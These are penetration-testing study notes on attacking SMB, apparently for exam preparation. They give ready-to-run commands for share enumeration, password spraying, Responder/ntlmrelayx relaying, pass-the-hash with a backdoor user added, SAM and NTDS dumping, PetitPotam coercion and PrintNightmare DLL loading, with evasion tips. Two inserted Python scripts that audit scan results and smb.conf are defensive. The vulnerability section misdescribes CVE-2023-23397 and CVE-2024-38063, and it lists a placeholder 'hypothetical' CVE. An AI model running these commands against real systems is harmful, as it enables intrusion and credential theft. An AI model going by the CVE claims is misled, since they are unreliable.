# SMB

### **SMB Basics**

* Function: Protocol for sharing files, printers, serial ports, and other resources across networks. Operates in a client-server model; supports opportunistic locking for performance.
* Ports:
  * TCP/139, UDP/137-138 (NetBIOS over TCP/IP for legacy name resolution and browsing).
  * TCP/445 (Direct SMB over TCP/IP; modern/default).
* Samba: Open-source Unix/Linux/Windows implementation of SMB/CIFS. Config file: /etc/samba/smb.conf.
* MSRPC (DCE/RPC over SMB): Enables remote procedure calls for services like WMI, WinRM. Often tunnels through SMB (port 445).
* Key Protocols: NetBIOS (legacy naming), DCE/RPC (remote calls).

### **Enumeration**

Start passive (no creds) to map the attack surface, then go active.

Goal: Identify shares, users, versions, and perms without alerting.

* Nmap:

```bash
sudo nmap -sV -sC --script=smb* -p 137,139,445 <target_IP> -oA smb_enum
```

* **Info Gained**: SMB version, hostname, OS fingerprint, null session support (via smb-security-mode), shares (via smb-enum-shares), users/groups (via smb-enum-users).
* **Output Example**: `445/tcp open microsoft-ds? | smb-os-discovery: OS: Windows 10.0 Build 19041 (name:WIN-ABC); | smb2-security-mode: ... signing:enabled`
* **Practice**: Run on your lab VM; verify script output in `smb_enum.gnmap`.

**Advanced Enumeration**

* **Enum4linux-ng (Modern Replacement for Enum4linux):**

```bash
enum4linux-ng -A <target_IP> -o enum_output.json
```

* **Why Better:** Faster, JSON output for scripting, handles SMBv3 better. Includes RID cycling for user enum.
  * **Info**: Shares, policies, users, groups, sessions.
* **SMBMap (Permissions-Focused):**

```bash
smbmap -H <target_IP> -u '' -p ''  # Anonymous
smbmap -H <target_IP> -u <user> -p <pass>  # Authenticated
```

* Output: Share paths, read/write perms (e.g., `[C$] Disk Auto READ ONLY Domain Admins`).
* **Impacket Enum Tools:**

{% code overflow="wrap" %}

```bash
python3 /opt/impacket/examples/lookupsid.py -hashes :<NT_hash> DOMAIN/<user>@<target_IP>  # SID enumeration; -hashes takes LM:NT, LM half left empty
```

{% endcode %}

* RPC-Focused (for MSRPC):

```bash
rpcclient -U '' -N <target_IP> -c "enumdomusers"  # Null session users
rpcclient -U <user>%<pass> <target_IP> -c "srvinfo"  # Server info
```

* Tip: Chain tools (Nmap → Enum4linux-ng → SMBMap). Pitfall: Firewalls block UDP/137—fall back to TCP/445. Practice parsing JSON outputs for reports.
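
Added example (not part of the original notes): a small Python triage of the `smb_enum.xml` that `-oA` writes, flagging hosts whose smb2-security-mode output says signing is not required (relay exposure) and whose smb-protocols output lists an SMBv1 dialect (downgrade exposure), the two checks later sections depend on. The XML is a constructed sample in Nmap's shape, not real scan output.

```python
"""Triage Nmap SMB script results (smb_enum.xml from -oA) for signing and SMBv1 exposure."""
import xml.etree.ElementTree as ET

# Constructed sample in the shape Nmap writes for smb2-security-mode and smb-protocols
# (the "output" attribute carries the same text the console shows, with &#xa; newlines).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
 <host><address addr="10.0.0.5" addrtype="ipv4"/><hostscript>
  <script id="smb2-security-mode" output="&#xa;  3:1:1: &#xa;    Message signing enabled but not required&#xa;"/>
  <script id="smb-protocols" output="&#xa;  dialects: &#xa;    NT LM 0.12 (SMBv1) [dangerous, but default]&#xa;    2:1:0&#xa;    3:1:1&#xa;"/>
 </hostscript></host>
 <host><address addr="10.0.0.6" addrtype="ipv4"/><hostscript>
  <script id="smb2-security-mode" output="&#xa;  3:1:1: &#xa;    Message signing enabled and required&#xa;"/>
  <script id="smb-protocols" output="&#xa;  dialects: &#xa;    3:1:1&#xa;"/>
 </hostscript></host>
</nmaprun>"""


def triage_smb_scan(xml_text):
    """Map each scanned IPv4 host to the SMB weaknesses its script output reveals."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        issues = []
        for script in host.iter("script"):
            out = script.get("output", "")
            if script.get("id") == "smb2-security-mode":
                # "enabled but not required" (SMB2/3) or "disabled" (SMB1) both permit relay
                if "not required" in out or "disabled" in out:
                    issues.append("SMB signing not enforced: NTLM relay possible; require signing")
            elif script.get("id") == "smb-protocols" and "SMBv1" in out:
                issues.append("SMBv1 dialect offered: downgrade possible; disable SMB1")
        findings[addr_el.get("addr")] = issues
    return findings


if __name__ == "__main__":
    for ip, issues in triage_smb_scan(SAMPLE_XML).items():
        print(ip, "->", issues or ["no SMB findings"])
```

Point it at your own `smb_enum.xml` by replacing `SAMPLE_XML` with the file contents; hosts with an empty list need no signing or SMB1 remediation.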

***

### **Misconfigurations**

Focus on weak auth, over-permissive shares. Test anonymously first.

* **Null Sessions (No Authentication Required):**

```bash
smbclient -N -L //<target_IP>/  # List shares
smbclient -N //<target_IP>/IPC$  # Connect to IPC$ for enum
smbmap -H <target_IP>  # Permissions
```

* **Guest/Anonymous Access:**

```bash
crackmapexec smb <target_IP> -u 'guest' -p '' --shares  # Enumerate shares as guest
```

* **Weak Share Permissions:** Use smbclient to attempt reads/writes on shares like `C$, ADMIN$`.
* **Downgrade Attacks:** Force SMBv1 with `smbclient -m NT1 -L //<target_IP>` (NT1 is Samba's name for the SMB1 dialect). Detect with Nmap's `smb-protocols` script.
* **Registry Misconfigs:** Post-access, dump via `reg save HKLM\SAM sam.hive` (if admin share access).
* **Tip**: Document perms in a table (Share | Perms | Risk). Pitfall: Modern Windows blocks null sessions by default; check for `RestrictAnonymous=2` under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` in the registry.
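
Added example (not from the original notes): the server-side counterpart of these anonymous tests, a Python `configparser` audit of a Samba `smb.conf` that flags the settings behind null/guest sessions, SMBv1 acceptance and unenforced signing. The option names are real Samba parameters; the sample config and its values are constructed.

```python
"""Audit a Samba smb.conf for the exposures this section probes from the outside."""
import configparser

SMB1_DIALECTS = {"core", "coreplus", "lanman1", "lanman2", "nt1"}  # NT1 and older = SMBv1

# Constructed sample with deliberately weak settings (not a real deployment).
SAMPLE_SMB_CONF = """\
[global]
   server min protocol = NT1        ; accepts SMBv1 clients
   server signing = auto            ; signing negotiable, not enforced
   map to guest = Bad User          ; unknown users are mapped to guest

[public]
   path = /srv/public
   guest ok = yes
   read only = no

[finance]
   path = /srv/finance
   valid users = @finance
   read only = yes
"""

def _yes(value):
    return value.strip().lower() in ("yes", "true", "1")

def audit_smb_conf(text):
    """Return a list of findings; an empty list means none of the checked weaknesses."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",),
                                   inline_comment_prefixes=(";", "#"))  # smb.conf: no % expansion
    cp.read_string(text)
    g = cp["global"] if cp.has_section("global") else {}
    findings = []
    if g.get("server min protocol", "SMB2_02").strip().lower() in SMB1_DIALECTS:
        findings.append("[global] server min protocol allows SMBv1: downgrade risk")
    if g.get("server signing", "default").strip().lower() != "mandatory":
        findings.append("[global] server signing is not mandatory: NTLM relay risk")
    if g.get("map to guest", "Never").strip().lower() != "never":
        findings.append("[global] map to guest enabled: null/guest sessions succeed")
    for name in cp.sections():
        if name.lower() in ("global", "homes", "printers"):
            continue
        s = cp[name]
        guest = _yes(s.get("guest ok", s.get("public", "no")))  # "public" is a Samba synonym
        writable = _yes(s.get("writable", s.get("writeable", "no"))) or not _yes(s.get("read only", "yes"))
        if guest:
            findings.append(f"[{name}] guest-accessible share" + (", writable" if writable else ""))
    return findings
```

Feed it the real file with `audit_smb_conf(open("/etc/samba/smb.conf").read())`; each finding maps to one of the anonymous checks above.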

***

### **Protocol-Specific Attacks**

Prioritise low-hanging fruit: Brute force → Relay → Vuln exploits.

* Brute-Forcing/Password Spraying:

{% code overflow="wrap" %}

```bash
crackmapexec smb <target_IP>/24 -u users.txt -p passwords.txt --continue-on-success  # Spray across subnet
hydra -L users.txt -P pass.txt <target_IP> smb
```

{% endcode %}

* **Why CME?** Detects AS-REP roasting, Kerberoasting implicitly.
* Metasploit SMB Login:

```bash
msfconsole -q
use auxiliary/scanner/smb/smb_login
set RHOSTS <target_IP>
set USER_FILE users.txt
set PASS_FILE pass.txt
set STOP_ON_SUCCESS true
set VERBOSE true
run
```

* Practice: Save successes to loot; use for follow-on attacks.

**Relay Attacks (NTLM Relay)**

* Setup with Responder + ntlmrelayx:

```bash
# Terminal 1: Poison LLMNR/NBT-NS/MDNS
responder -I eth0 -wrd  # -w: WPAD, -r: NBT-NS, -d: MDNS
# Terminal 2: Relay to SMB
python3 /opt/impacket/examples/ntlmrelayx.py -t smb://<target_IP> -smb2support  # single-dash flag, as Impacket expects
```

* **Outcome**: Captures NTLM hashes; relays for RCE (e.g., DCSync if domain controller).
  * **Evasion**: Add --no-http to avoid detection; use -6 for IPv6 poisoning.
* **Multi-Relay (Impacket):**

{% code overflow="wrap" %}

```bash
ntlmrelayx.py -tf targets.txt -smb2support --delegate-access  # Delegate for persistence
```

{% endcode %}

* **Tip**: Understand the LLMNR poisoning chain. Pitfall: SMB signing blocks relays; check with `crackmapexec smb <target_IP> --shares -u '' -p '' | grep signing`.

***

### **Windows Attacks**

Leverage creds/hashes for lateral movement/escalation.

* **Remote Code Execution (RCE):**

{% code overflow="wrap" %}

```bash
# Impacket psexec (service-based: uploads a binary to ADMIN$ and starts it as a service; noisy)
psexec.py <domain>/<user>:<pass>@<target_IP> cmd.exe
# CME smbexec (stealthier, no shell)
crackmapexec smb <target_IP> -u <user> -p <pass> -x "powershell.exe -c whoami" --exec-method smbexec
```

{% endcode %}

* **Enumerate Logged-on Users:**

{% code overflow="wrap" %}

```bash
crackmapexec smb <target_IP> -u <user> -p <pass> --loggedon-users --sessions  # Also shows sessions
```

{% endcode %}

* **Extract Hashes from SAM:**

```bash
crackmapexec smb <target_IP> -u <user> -p <pass> --sam  # Dumps local SAM
secretsdump.py <domain>/<user>:<pass>@<target_IP>  # Full NTDS.dit if DC
```

* **Pass-the-Hash (PtH):**

{% code overflow="wrap" %}

```bash
crackmapexec smb <target_IP> -u <user> -H <ntlm_hash> -x "net user hacker P@ssw0rd /add"  # Add user
wmiexec.py -hashes <ntlm_hash> <user>@<target_IP> "whoami /priv"  # WMI for stealth
```

{% endcode %}

### **Privilege Escalation via SMB**

* **Unquoted Service Paths (via SMB Shares):**
  1. Enum services: `crackmapexec smb <target_IP> -u <user> -p <pass> --services`.
  2. If vulnerable (e.g., an unquoted path such as `C:\Program Files\Service.exe`), upload the payload to the share and trigger the service.
* **DLL Hijacking over SMB:** Host malicious DLL on attacker-controlled share; coerce via PrintNightmare (CVE-2021-34527) or PetitPotam.

```bash
# Coerce auth with PetitPotam
python3 petitpotam.py <attacker_IP> <target_IP>  # Forces auth to your Responder
```

* **Tip**: Chain PtH → Escalation. Pitfall: UAC blocks; use --local-auth in CME.

***

**Forced Authentication Attacks (Responder)**

* Core Setup:

```bash
responder -I <interface> -v -A  # -A: analyze mode (listen and log only, no poisoning)
# Capture: watch the output for "Sending NTLMv2 challenge"
```

* **WPAD Poisoning Integration:**

```bash
# In smb.conf: [WPAD] path=/wpad.dat; read list = yes
# Then: responder -I eth0 -wP  # Proxy Auto-Discovery
```

* **Detection Evasion:** Run on non-standard ports; monitor with Wireshark for `NTLMSSP_AUTH`.

***

**Hash Cracking**

* NTLMv2 (Mode 5600):

```bash
hashcat -m 5600 ntlm_hashes.txt rockyou.txt -w 3 -O  # GPU-optimized
john --format=netntlmv2 hashes.txt --wordlist=rockyou.txt  # CPU alternative
```

* **Hybrid Attacks:** `hashcat -a 6 -m 5600 hashes.txt rockyou.txt ?d?d?d?d` (append 4 digits; `-a 6` selects wordlist + mask mode).
* **Practice**: Use captured hashes from Responder; aim for <5min cracks on weak pass (e.g., "Password123").

***

### **Latest SMB Vulnerabilities**

SMBGhost (CVE-2020-0796) is the classic but is dated; the list below adds more recent CVEs (post-2023). Focus on zero-days and patches.

* **SMBGhost (CVE-2020-0796):** Exploit: `msfconsole` > `use exploit/windows/smb/cve_2020_0796_smbghost`. Affected: Win10 1903/1909. Patch: KB4551762.
* **PrintNightmare (CVE-2021-34527, SMB-Related via Spooler):** RCE via SMB spooler shares. Exploit:

```bash
python3 spooler.py <domain>/<user>:<pass>@<target_IP> /path/to/malicious.dll
```

* Impact: Local priv esc to SYSTEM.
* **CVE-2023-23397 (Net-NTLM3 Bypass):** Allows relay despite signing. Tool: Custom Impacket patch.
* **CVE-2024-38063 (SMB Client RCE):** Denial-of-service leading to info leak in Win11. Exploit PoC: GitHub (search "CVE-2024-38063"). Affected: Win10/11 pre-July 2024 patch.
* **Emerging (2025):** Watch CVE-2025-XXXX (hypothetical SMB multichannel flaw; check MSRC monthly). Use searchsploit smb for PoCs.
* **Tip**: Know detection (e.g., YARA rules for EternalBlue). Pitfall: Exploits fail on patched systems—always version-check first. Practice: Metasploit modules for EternalBlue (MS17-010) as a classic.

#### **Practice Checklist**

* Lab Setup: Vuln Win VM + Kali.
* Enumerate 3 targets; document findings.
* Successful relay/PtH on 1 target.
* Crack 5 hashes; report weak policies.
* Simulate exam: 30min SMB-only pentest.
